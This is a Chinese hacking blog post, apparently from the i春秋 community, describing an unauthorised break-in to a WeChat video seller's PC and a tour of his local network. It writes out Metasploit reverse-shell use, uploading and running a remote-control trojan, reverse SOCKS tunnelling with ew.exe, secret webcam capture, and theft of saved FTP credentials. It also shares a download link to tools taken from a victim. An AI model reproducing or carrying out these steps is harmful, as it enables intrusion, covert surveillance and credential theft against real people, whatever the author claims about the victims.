前幾天看到某個微信賣小電影的,然后通過套路拿到拿到對方電腦控制權以后,對他內網進行了一次漫游,特地給各位大佬分享下過程。
本文作者:i春秋作家——jasonx
另外各位表哥,如果你感覺文章還不錯,動動你的手指,在文章的底部幫我點贊,謝謝。^_^
**0×01 我是如何拿到控制權的?**
這個問題我以后也許會說出來,但是目前不能說,因為影響太大了,通過這種手段攻破的電腦,基本都是騙子,BC,還有搞灰黑產的。
因為利用這個騷路子,讓我看到了那些搞灰黑產的各種套路深啊。
**0×02 先看看微信賣小電影的**
通過msf反彈拿到的,我們在msf下輸入screenshot可以對他進行截屏,並發送到我們的/root目錄下
然后為了方便控制,用下面的命令上傳遠控到他電腦上,並運行。
upload m.exe c:\\windows\\m.exe
shell
c:\windows\mr.exe
上線以后我們先看看內網情況。
ipconfig可以查看他本機的IP。
繼續輸入arp -a 查看他內網的其他電腦。
發現存在好多台電腦。
通過遠控的文件管理功能可以看到,這家伙電腦里面到處都存了各種 不可描述.mp4
各位表哥先別留郵箱,我真的沒下載他的小電影….真的沒下…沒下..ヾ(゚∀゚ゞ)
**0×03 反彈代理擼內網**
通過遠控上傳ew.exe
然后在本地執行:ew.exe -s rcsocks -l 1008 -e 888
說明:監聽888端口,把接收到的數據轉到本地的1008端口。
在目標上執行ew.exe -s rssocks -d 10.10.10.10 -e 888
說明:開啟sockes 並反彈到ip地址為10.10.10.10 端口為888
反彈代理成功以后,本地會出現rssocks cmd_socket ok!
現在打開我們的SocksCap64,新建一個代理。
ip為127.0.0.1端口為1008,配置好了以后,點擊保存。
現在我們把需要走代理的工具都放到SocksCap64里面。
現在我們掃描下他的內網
內網挨個打一發,發現了不得了的事情了。
打下的第一台電腦截屏如下,看到這么多QQ,一看就知道不正常了。
上遠控繼續翻他文件
不用說了,有各種騙人的話術,還有通過遠控發現他在騙人,證明這TMD就是個專業搞詐騙的。
這里科普下:騙子基本都會有很多套話術,他和你聊天的時候,基本都是一條一條復制黏貼的,最后直到對方上當。
我們在kali里面用命令webcam_list查看下他是否有攝像頭。
圖中可以看到,有攝像頭。
繼續輸入webcam_snap -i 1 -v fales可以實現不開閃光燈偷偷利用他攝像頭拍照,並發送到我們kali的/root目錄下。
不過你會發現,攝像頭被東西擋住了,太TM狡猾了。
又繼續在內網擼了幾台,大多數都是BC的。
**0×04 有意思的來了**
最后擼到一台,dir查看他桌面文件的時候,發現了一些掃描軟件,你沒猜錯,這是個大黑闊。(o゚▽゚)o
還是老套路,上傳遠控並運行。
然后通過遠控的文件管理翻下他文件,不得了..不得了,各種CMS的exp。
順便看看大黑闊的工具….
遠控監視大黑闊電腦屏幕看看…
大黑闊看到這貼不要打我,我真的是不小心進來的…ヾ(●´∀`●)
翻文件的時候發現一個ftp軟件,突然靈機一動……{:6_176:}
很多ftp軟件都會保存你的用戶名、密碼、ip等等,方便你下次連接,但是這些配置信息一般都是在ftp軟件的目錄下的。
那么我們只要下載他的ftp軟件所有文件下來…..
下載完以后,我們打開ftp看看,在站點列表里面有十幾個ftp,登陸上去一看。
好家伙,全是BC站…..
總結:我只能說一句“牛逼了”一個局域網內的人基本都是搞灰黑色產的,內網擼了一遍,基本上所有電腦都沒殺軟,其中有幾台裝有某某管家,但是注入dll的時候,竟然連警告都沒有……起碼人家某數字殺毒還會報毒。
打包了部分大黑闊電腦上下載的工具,鏈接:https://pan.baidu.com/s/11azFaSRmAsQNQUgOgXFGLA
密碼:wkhs
>>>>>> 黑客入門必備技能 帶你入坑和逗比表哥們一起聊聊黑客的事兒,他們說高精尖的技術比農葯都好玩~